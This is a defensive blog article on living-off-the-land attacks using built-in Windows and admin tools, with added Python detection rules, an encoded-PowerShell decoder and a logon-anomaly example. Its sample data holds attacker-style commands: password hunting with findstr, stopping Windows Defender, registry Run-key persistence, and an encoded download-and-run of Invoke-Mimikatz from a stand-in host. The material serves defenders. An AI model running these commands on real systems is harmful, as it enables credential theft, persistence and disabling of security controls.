Introduction
Living off the land (LOTL) is a term that gets thrown around a lot at security conferences and webinars, but what does it mean? Living off the land attacks refer to an attacker leveraging what is already available in the environment rather than bringing along a whole kit of custom software and malware. The benefit for the attacker is that their activities are less likely to trigger antivirus alerts because they are using trusted, often Microsoft-signed, software.
Further, their actions are more likely to blend in with normal administrative activity.
Think of the attacker as an enemy combatant infiltrating and attacking another country. If they are wearing a foreign uniform, speak a nonnative language, and bring equipment built in their home country, they will be spotted quickly.
On the other hand, if they live off the land, wear native civilian clothes from the victim country, speak the same language well, and build or acquire weapons readily available in the victim country, they are going to be harder to spot and more likely to succeed in their objective.
Digital Double-Edged Swords
But what kind of digital weapons can attackers procure in your environments, you ask?
Well, like the Peter Parker Principle says, “With great power, comes great responsibility.” The same tools that allow your administrators to be efficient and effective are double-edged swords that attackers will use against you in living off the land attacks.
Let’s look at what those are:
Native Windows Tools
The following tools are frequently leveraged for living off the land attacks once attackers have established a foothold in your environment.
Windows Command Processor (CMD.exe)
CMD.exe is the command-line console that ships with every Windows operating system. It gives attackers a basic terminal to interact with. While it lacks many of the features of PowerShell, and unlike the Windows Script Host executables (CScript and WScript) it cannot run VBScript, it is still regularly observed for basic information gathering or launching malicious applications. CMD.exe can also run batch scripts, giving attackers a degree of automation.
Windows Based Script Host (WScript.exe) and Console Based Script Host (CScript.exe)
The Windows-based and console-based script hosts fill a similar role to CMD.exe but add the ability to execute VBScript and JScript files, allowing more attacker automation than batch scripts alone. The two differ only in where output goes: WScript.exe shows it in dialog boxes, CScript.exe writes it to the console.
PowerShell
A time-tested administrative favorite, PowerShell is frequently used for living off the land attacks. For those unfamiliar with it, PowerShell is a robust scripting language that first appeared back in 2006. Its capabilities have improved drastically since then as new versions have come out, including cross-platform functionality. Attackers will use PowerShell to do almost anything you can imagine and often obfuscate their scripts in a variety of ways, Base64 encoding (handed to powershell.exe via -EncodedCommand) being one of the most popular.
There is even a PowerShell scripted version of the popular Mimikatz application ( https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1 ) used to harvest credentials stored in a system’s memory. Even if (and this is a big IF) antivirus products detect the PowerShell version of Mimikatz, it is a breeze for attackers to modify or obfuscate it enough to slip past.
On a positive note, the newer versions of PowerShell provide dramatically better logging and forensic artifacts than their predecessors, including recorded commands and script blocks in the Windows Event Logs (C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx and Microsoft-Windows-PowerShell%4Operational.evtx, where Event ID 4104 holds logged script blocks once Script Block Logging is enabled) and a PSReadLine command history file (version 5+) at %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.
Task Scheduler Configuration Tool (schtasks.exe) and Scheduled Service Command Line Interface (at.exe)
Task Scheduler and the older at.exe are great for administrators to schedule things like applications, updates, or backups, but they are also handy for attackers to maintain persistence or delay the detonation of malware, on the local system or on remote ones. Attackers have historically favored at.exe for a couple of reasons: it is easier to use, and its tasks run as SYSTEM both locally and remotely.
at.exe is deprecated on current Windows versions, so schtasks.exe (with /create and a /tr action pointing at the payload) is what you will more often see today, and any at.exe execution on a modern system deserves a look.
https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/at
Microsoft HTML Application host (MSHTA.exe)
I’ve yet to see a legitimate use for this executable, but it comes along for the ride with Windows, and it is a favorite of attackers.
Microsoft HTML Application Host is a standalone executable that runs HTML Applications (.hta), and with them VBScript and JScript, with the full rights of the user who launched it. Because this happens outside a web browser, none of the browser's sandboxing or security zone controls apply to whatever mshta.exe executes, and it will happily fetch and run an .hta from a URL given on the command line.
https://docs.microsoft.com/en-us/previous-versions//ms536471(v=vs.85)?redirectedfrom=MSDN
Registry Console Tool (reg.exe)
Registry hives (and there are quite a few of them) are essentially databases where Windows stores all sorts of configuration settings, records certain events, and other miscellaneous data. These hives are critical for Windows to function properly and to customize the system to suit business needs. reg.exe is the built-in command-line tool for querying, adding, exporting, and deleting registry data, and the registry is a staple among attackers for maintaining persistence (Run keys, services, Winlogon), storing malware settings, stashing encoded executables in values, and much more.
A recent example is the "BlackLivesMatter" registry key created by Sodinokibi (REvil) ransomware, where its configuration is stored in subkeys, including the file extension appended to encrypted files.
Common persistence locations within the registry can be found here: https://attack.mitre.org/techniques/T1547/001/.
Windows Management Instrumentation Command-Line (wmic.exe)
Windows Management Instrumentation Command-Line is a command-line interface for WMI. Administrators find it useful for interrogating or changing system settings on local or remote systems. It can also be used to run executables or scripts.
Attackers like it for the same reasons, and because wmic.exe is a signed Microsoft binary it can be leveraged to slip past some security controls like application allowlisting, for example with wmic process call create to launch a payload, locally or on a remote system via /node.
Service Control Manager Configuration Tool (sc.exe)
The Service Control Manager configuration tool is a command-line method for managing services on the system. It can be used for querying settings and for starting, stopping, or reconfiguring services. Living off the land attacks use it for both, and it can often be observed disabling security, backup, or other services that keep files locked which attackers are looking to encrypt, like databases.
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-config
Find String (QGREP) Utility (findstr.exe)
grep is a well-known Unix/Linux utility for finding specific text within a set of files or folders. Find String (findstr.exe) is the very similar Windows utility used for the same purpose. That makes it a great tool for attackers to search for things like plaintext passwords and other confidential information, for example findstr /si password *.xml *.ini *.txt run across a file share.
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/findstr
Whoami (whoami.exe)
Unlike the executables above, whoami is not one that I've seen leveraged for particularly nefarious purposes other than attackers checking whether they've successfully elevated, confirming which account and privileges they now hold (whoami /all, whoami /priv), or performing additional reconnaissance.
Administrators typically only use this command during deep troubleshooting, so seeing it executed is good cause to investigate further.
But wait, there’s more…
The above executables are only a small portion of the native Windows tools that can be turned against you. For a more comprehensive list, check out the LOLBAS Project:
https://lolbas-project.github.io/#
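Here is an added detection example, written for this article rather than taken from it: a handful of Python rules run over constructed process-creation records of the kind you would pull from Security Event ID 4688 or Sysmon Event ID 1, one rule per tool described above (PowerShell's encoded commands are a topic of their own and are left out here). The service watchlist, path patterns, and sample events are illustrative assumptions, not data from any real incident.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record, the fields you would pull from Security
    Event ID 4688 or Sysmon Event ID 1. Constructed for this example."""
    host: str
    user: str
    parent: str
    image: str           # file name of the new process
    command_line: str


# Directories a normal admin workflow rarely launches payloads from.
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Downloads|Users\\Public|ProgramData)\\", re.I)
# Autostart keys (see MITRE ATT&CK T1547.001).
RUN_KEYS = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.I)
# Script hosts and proxies that rarely belong in a scheduled task action.
SCRIPT_HOSTS = re.compile(r"\b(mshta|wscript|cscript|cmd|powershell|rundll32|regsvr32)(\.exe)?\b", re.I)
# Illustrative watchlist (an assumption, not from the article): services attackers
# stop to blind defenders or to unlock files before encryption.
PROTECTED_SERVICES = {"windefend", "sense", "vss", "mssqlserver", "sqlwriter", "veeambackupsvc"}


def _image(ev):
    return ev.image.lower()


def rule_mshta_remote_or_dropped(ev):
    """mshta pulling an .hta from a URL/protocol handler or a user-writable path."""
    if _image(ev) != "mshta.exe":
        return False
    cl = ev.command_line.lower()
    return any(m in cl for m in ("http://", "https://", "javascript:", "vbscript:")) \
        or USER_WRITABLE.search(cl) is not None


def rule_wmic_process_create(ev):
    """wmic used as a launcher, locally or against a remote /node."""
    return _image(ev) == "wmic.exe" and \
        re.search(r"\bprocess\b.*\bcall\b.*\bcreate\b", ev.command_line, re.I) is not None


def rule_sc_tamper(ev):
    """sc stop/config/delete against a watched service (sc [\\\\server] verb service ...)."""
    if _image(ev) != "sc.exe":
        return False
    toks = [t for t in ev.command_line.lower().split() if not t.startswith("\\\\")]
    return len(toks) >= 3 and toks[1] in {"stop", "config", "delete"} and toks[2] in PROTECTED_SERVICES


def rule_at_exe(ev):
    """at.exe is deprecated; any use on a modern system is worth a look."""
    return _image(ev) == "at.exe"


def rule_schtasks_suspicious_action(ev):
    """schtasks /create whose /tr action runs a script host or a user-writable path."""
    if _image(ev) != "schtasks.exe" or not re.search(r"/create\b", ev.command_line, re.I):
        return False
    m = re.search(r'/tr\s+("[^"]*"|\S+)', ev.command_line, re.I)
    action = m.group(1) if m else ""
    return USER_WRITABLE.search(action) is not None or SCRIPT_HOSTS.search(action) is not None


def rule_findstr_secret_hunting(ev):
    return _image(ev) == "findstr.exe" and \
        re.search(r"pass(word|wd)?|pwd|secret|credential", ev.command_line, re.I) is not None


def rule_whoami_recon(ev):
    return _image(ev) == "whoami.exe" and \
        re.search(r"/(all|priv|groups)\b", ev.command_line, re.I) is not None


def rule_reg_run_key(ev):
    return _image(ev) == "reg.exe" and re.search(r"\badd\b", ev.command_line, re.I) is not None \
        and RUN_KEYS.search(ev.command_line) is not None


def rule_wsh_dropped_script(ev):
    return _image(ev) in {"wscript.exe", "cscript.exe"} and USER_WRITABLE.search(ev.command_line) is not None


RULES = {
    "mshta_remote_or_dropped": rule_mshta_remote_or_dropped,
    "wmic_process_call_create": rule_wmic_process_create,
    "sc_protected_service_tamper": rule_sc_tamper,
    "at_exe_used": rule_at_exe,
    "schtasks_suspicious_action": rule_schtasks_suspicious_action,
    "findstr_secret_hunting": rule_findstr_secret_hunting,
    "whoami_privilege_recon": rule_whoami_recon,
    "reg_run_key_persistence": rule_reg_run_key,
    "wsh_script_from_user_path": rule_wsh_dropped_script,
}


def evaluate(events):
    """Return (rule_name, event) for every rule that fires on every event."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample (not from a real incident): two benign lines, then one hit per rule.
SAMPLE_EVENTS = [
    ProcessEvent("WS01", "CORP\\jdoe", "explorer.exe", "cmd.exe", "cmd.exe /c dir"),
    ProcessEvent("SRV02", "CORP\\admin1", "cmd.exe", "sc.exe", "sc.exe query spooler"),
    ProcessEvent("WS01", "CORP\\jdoe", "winword.exe", "mshta.exe", "mshta.exe https://example.invalid/update.hta"),
    ProcessEvent("SRV02", "CORP\\svc_bkp", "cmd.exe", "wmic.exe", 'wmic.exe /node:"SRV03" process call create "cmd.exe /c u.exe"'),
    ProcessEvent("SRV02", "CORP\\admin1", "cmd.exe", "sc.exe", "sc.exe stop WinDefend"),
    ProcessEvent("WS05", "CORP\\mroom", "cmd.exe", "at.exe", r"at.exe \\SRV03 23:00 C:\Windows\Temp\u.bat"),
    ProcessEvent("WS05", "CORP\\mroom", "cmd.exe", "schtasks.exe",
                 r'schtasks.exe /create /tn Updater /tr "C:\Users\mroom\AppData\Roaming\u.exe" /sc minute /mo 5'),
    ProcessEvent("WS05", "CORP\\mroom", "cmd.exe", "findstr.exe", "findstr.exe /si password *.xml *.ini *.txt"),
    ProcessEvent("WS05", "CORP\\mroom", "cmd.exe", "whoami.exe", "whoami.exe /priv"),
    ProcessEvent("WS05", "CORP\\mroom", "cmd.exe", "reg.exe",
                 r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v u /t REG_SZ /d C:\Users\mroom\AppData\Roaming\u.exe"),
    ProcessEvent("WS01", "CORP\\jdoe", "explorer.exe", "wscript.exe", r"wscript.exe C:\Users\jdoe\Downloads\invoice.vbs"),
]

if __name__ == "__main__":
    for name, ev in evaluate(SAMPLE_EVENTS):
        print(f"{ev.host} {ev.user} [{name}] {ev.command_line}")
```

Run it and the nine attacker-style lines light up while the two benign ones (a cmd dir and an sc query) stay quiet. The rules deliberately key on arguments and launch paths rather than on the binary alone, since every one of these executables is legitimately used by administrators.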
Common Administrative Tools
The following are common, but not necessarily available in all environments. When they are, they can be a bit like having your own gun turned on you by a burglar.
SysInternals
Sysinternals is a Microsoft tool suite that offers powerful resources commonly used by administrators and IT troubleshooters.
One component used by attackers frequently is PsExec.exe; they often download it if it isn't already available.
PsExec runs arbitrary commands (cmd.exe, PowerShell, or any other executable) on remote machines by copying a service binary (PSEXESVC) to the target and starting it, which is just as useful for evil as for good. That service installation, and the accompanying Event ID 7045 "service was installed" record on the target, is a good place to look for it.
https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
Remote Management
LogMeIn, GoToMyPC, TeamViewer, VNC, Kaseya, ConnectWise, etc., are often used within environments to make it easier for administrators to log into various systems from anywhere in the world.
In some cases new remote access software is installed, or vendors push their own remote access programs, and the old ones are never removed. There is no need for the bad guys to install something like Cobalt Strike for a back door when applications like this are already there.
What to Do?
Now you’ve seen some of the tools that exist in our environments that can be used in living off the land attacks.
So, how can we avoid attacks of this kind, knowing that these are critical tools and functions for the success of our businesses?
Combatting Living Off the Land Attacks
Let’s be honest, there are a lot of aspects of information security that play out like this. Fortunately, there are some things that you can do to make the attackers’ lives more difficult and allow your defenders to detect them early.
PowerShell
As for PowerShell, there are a lot of opportunities to tighten this tool up. Here are a few things to consider:
- If you have folks leveraging PowerShell regularly, sign their scripts and enforce the AllSigned execution policy. After that, any PowerShell being run that is not signed can either be blocked outright or raise the alarm bells for your incident responders. Keep in mind that execution policy by itself is not a security boundary (powershell -ExecutionPolicy Bypass gets around it), so back it with application control such as AppLocker or WDAC, or at least alert on the bypass.
- Enable PowerShell remoting and ban PsExec. This has more to do with how credentials are passed (or not passed, in the case of PowerShell remoting) to the target system. A WinRM session authenticated with Kerberos is a network logon, so the administrator's credentials are not cached on the target (unless you enable CredSSP); PsExec with explicit credentials, RunAs, or simply Remote Desktop-ing in leave reusable credentials in memory for Mimikatz to harvest.
- Ensure PowerShell logging (Module Logging, Script Block Logging, and ideally Transcription) is enabled and that the resulting events (4103 and 4104 in Microsoft-Windows-PowerShell/Operational) are forwarded to a SIEM. Alert on anomalies like Base64-encoded PowerShell (-EncodedCommand and its abbreviations).
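To show what the last bullet looks like in practice, and why Base64 on its own is not the whole story, here is an added Python example (not from the original article) that pulls the -EncodedCommand payload off a PowerShell command line, decodes it the way PowerShell does (Base64 over UTF-16LE text), and scores the result against a short indicator list that includes the Invoke-Mimikatz download discussed earlier. The sample command lines and the indicator list are constructed for this example; the encoded payload is generated inline rather than copied from any incident.

```python
import base64
import binascii
import re
from typing import Optional, Tuple

POWERSHELL_IMAGES = {"powershell.exe", "powershell", "pwsh.exe", "pwsh", "powershell_ise.exe"}

# Strings worth alerting on once the payload is readable. Illustrative (an
# assumption for this example), not an exhaustive list.
INDICATORS = [
    "Invoke-Mimikatz", "sekurlsa", "DownloadString", "DownloadFile", "Net.WebClient",
    "Invoke-WebRequest", "Invoke-Expression", "IEX", "FromBase64String", "DeflateStream",
    "GzipStream", "Add-Type", "VirtualAlloc",
]
# Launcher flags on the command line itself that scripts run by people rarely carry.
LAUNCHER_FLAGS = re.compile(r"(?:^|\s)-(?:nop|noni|w\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)


def _is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en,
    -enc, ...) plus the documented alias -ec. -ep and -ex are other parameters."""
    if token[:1] not in "-/":
        return False
    flag = token[1:].lower()
    return bool(flag) and (flag == "ec" or "encodedcommand".startswith(flag))


def extract_encoded_payloads(command_line: str):
    """Return the Base64 blobs that follow every encoded-command flag on the line."""
    toks = command_line.split()
    return [toks[i + 1].strip("'\"") for i, t in enumerate(toks[:-1]) if _is_encoded_flag(t)]


def decode_encoded_command(payload: str) -> Tuple[Optional[str], Optional[str]]:
    """-EncodedCommand is Base64 over UTF-16LE. Returns (script, error)."""
    try:
        raw = base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError) as exc:
        return None, f"undecodable Base64 (truncated log line?): {exc}"
    if len(raw) % 2:
        return None, "odd byte count: not UTF-16LE, or truncated"
    return raw.decode("utf-16-le", errors="replace"), None


def analyze(command_line: str) -> dict:
    """Triage one process command line into fields a SIEM rule could key on."""
    toks = command_line.split()
    image = toks[0].strip('"').lower().rsplit("\\", 1)[-1] if toks else ""
    result = {"command_line": command_line, "is_powershell": image in POWERSHELL_IMAGES,
              "encoded": False, "decoded": None, "error": None, "indicators": []}
    if not result["is_powershell"]:
        return result
    haystack = command_line
    payloads = extract_encoded_payloads(command_line)
    if payloads:
        result["encoded"] = True
        result["decoded"], result["error"] = decode_encoded_command(payloads[0])
        haystack += " " + (result["decoded"] or "")
    low = haystack.lower()
    result["indicators"] = [ind for ind in INDICATORS if ind.lower() in low]
    result["indicators"] += ["launcher " + m.group(0).strip() for m in LAUNCHER_FLAGS.finditer(command_line)]
    return result


def triage(command_lines):
    return [analyze(cl) for cl in command_lines]


# Constructed sample command lines (not taken from a real incident).
_SCRIPT = ("IEX (New-Object Net.WebClient).DownloadString("
           "'http://example.invalid/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds")
_ENCODED = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\deploy.ps1",
    f"powershell.exe -nop -w hidden -enc {_ENCODED}",
    f"powershell.exe -e {_ENCODED[:-7]}",   # cut short by the log source, as long lines often are
    "cmd.exe /c whoami",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_COMMAND_LINES):
        print(r["encoded"], r["error"] or r["indicators"], (r["decoded"] or "")[:60])
```

Two edge cases are handled on purpose: powershell.exe accepts any unambiguous prefix of -EncodedCommand (so -e and -enc must be caught, not just the full name), and long command lines are frequently truncated by the log source, which yields an undecodable blob. The truncated case is still reported as encoded PowerShell with an error, because an analyst wants that alert even when the payload cannot be read.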
Software Asset Management
Know what is in your environment and what tools are normally used.
Not to pick on TeamViewer, but if TeamViewer is suddenly installed on a server or workstation and it’s not on an approved software list, somebody should start looking into it.
Establishing a software management process and getting rid of unapproved software will go a long way toward removing options for living off the land attacks. It will also help identify any new software attackers are trying to sneak in.
User Behavior Analytics
Forgive the buzzword, but conceptually, this is a technology that tracks what users normally do, applications they run, where they log on from, file shares accessed, etc.
That information should be fed into an algorithm that flags anomalies.
Perhaps your antivirus doesn’t catch custom malicious scripts because there’s no signature. Your user behavior analytics technology is likely going to alert you that the mailroom clerk’s user account suddenly reached out to every system in the environment when historically she’s rarely touched any system other than her desktop.
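As an added illustration (not code from the article), here is a minimal version of that baseline-and-deviation idea in Python: thirty days of constructed logon records establish each account's normal host footprint, then one new day is scored against it. The threshold of three times an account's busiest day, the ten-day minimum baseline, and the synthetic users are assumptions chosen for the example.

```python
import math
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Logon:
    """One successful logon (think Security Event ID 4624). Constructed for this example."""
    day: int      # ordinal day; a real pipeline would bucket timestamps
    user: str
    host: str


@dataclass
class Finding:
    user: str
    reason: str           # "host_fanout" or "insufficient_baseline"
    hosts_today: int
    new_hosts: int        # hosts this account had never touched in the baseline
    sample: List[str]     # a few of the hosts that drove the finding


def build_baseline(events: Iterable[Logon], baseline_days: Iterable[int]) -> Dict[str, dict]:
    """Per user: every host seen in the window and the busiest single day."""
    window = set(baseline_days)
    per_day = defaultdict(lambda: defaultdict(set))   # user -> day -> {hosts}
    for ev in events:
        if ev.day in window:
            per_day[ev.user][ev.day].add(ev.host)
    return {
        user: {
            "known_hosts": set().union(*days.values()),
            "max_hosts_per_day": max(len(h) for h in days.values()),
            "days_observed": len(days),
        }
        for user, days in per_day.items()
    }


def score_day(events, day, baseline, min_days=10, ratio=3.0, floor=3) -> List[Finding]:
    """Flag accounts whose distinct-host count today is far above their own norm."""
    today = defaultdict(set)
    for ev in events:
        if ev.day == day:
            today[ev.user].add(ev.host)
    findings = []
    for user, hosts in sorted(today.items()):
        base = baseline.get(user)
        if base is None or base["days_observed"] < min_days:
            # New hire or dormant account: there is no norm to compare against,
            # so say so instead of silently scoring it as normal.
            findings.append(Finding(user, "insufficient_baseline", len(hosts), len(hosts), sorted(hosts)[:5]))
            continue
        new = hosts - base["known_hosts"]
        threshold = max(floor, math.ceil(ratio * base["max_hosts_per_day"]))
        if len(hosts) >= threshold or len(new) >= threshold:
            findings.append(Finding(user, "host_fanout", len(hosts), len(new), sorted(new)[:5]))
    return findings


def constructed_events() -> List[Logon]:
    """Thirty quiet days, then a day 31 on which the mailroom clerk's account
    touches forty servers. Synthetic data, not from a real environment."""
    events = []
    for day in range(1, 31):
        events.append(Logon(day, "mroom", "WS-MAIL01"))
        events.append(Logon(day, "jdoe", "WS-FIN07"))
        if day % 5 == 0:
            events.append(Logon(day, "jdoe", "FILESRV01"))
        events += [Logon(day, "admin1", f"SRV{i:02d}") for i in range(12)]
    events += [Logon(31, "mroom", f"SRV{i:02d}") for i in range(40)]
    events += [Logon(31, "admin1", f"SRV{i:02d}") for i in range(14)]   # busy but normal admin day
    events += [Logon(31, "jdoe", "WS-FIN07"), Logon(31, "newhire", "WS-HR02")]
    return events


if __name__ == "__main__":
    evts = constructed_events()
    for f in score_day(evts, 31, build_baseline(evts, range(1, 31))):
        print(f"{f.user}: {f.reason} ({f.hosts_today} hosts today, {f.new_hosts} never seen) {f.sample}")
```

The clerk's account is flagged because forty hosts in a day is far above her own busiest day of one, while the administrator who routinely touches a dozen servers is not, even on a fourteen-server day. Accounts with no usable history (a new hire) are surfaced separately as insufficient_baseline rather than silently passed, which is the edge case that bites most real deployments.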
Credential Management
Credential Management is a big topic to address, but an important one. In general, the following recommendations should slow attackers down.
- Make a real effort to implement the Principle of Least Privilege. Don’t grant users access or rights that they don’t truly need for their job.
- Implement strong password policies, not just for everyday users, but for administrators and service accounts as well. Further, ensure those passwords are rotated regularly.
- Ensure users aren't leveraging shared accounts to manage systems. This includes local administrator accounts, which, if they share a password across machines, allow an attacker to easily move laterally across your environment.
- Speaking of local administrator accounts, implement Microsoft LAPS (Local Administrator Password Solution), which sets a unique, randomly generated local administrator password on each machine and stores it in Active Directory, so a hash dumped from one workstation is useless on the next.
Network Segmentation
Piggybacking on the Principle of Least Privilege, implement network segmentation.
Consider the normal flow of data within your environment and throw up roadblocks for anything that deviates from that. For example, there’s little need for the accounting department desktops to be able to remote desktop or SSH into servers.
Multi-Factor Authentication
This is no longer optional. Usernames and passwords are just too easy to get ahold of on their own. All externally facing login portals should have MFA in place. If the technology you are using can’t, raise hell with the vendor and put it behind something that can until they get it fixed.
Employ or Hire Threat Hunters
If you’ve detected some malicious behavior but are struggling to separate the artifacts from the noise, it may be time to seek outside help or hire skilled threat hunters.
Conclusion
Attackers will constantly attempt to utilize whatever they can to infiltrate your environment. This includes using tools that you’re already leveraging for your business against you.
There must be a balance between creating operational efficiencies for your employees and giving attackers more vectors for living off the land attacks.
By understanding what tools are being used within your environment, understanding how attackers may be able to leverage them against you, and nailing the basic principles and tactics to help you combat this, you’ll be able to efficiently run your business with less risk.
If you need help with an inventory of your tools, with implementing some of the defense tactics mentioned above, or if you are concerned one of your tools is being leveraged against you by an attacker, please don’t hesitate to reach out to us. We’re happy to help.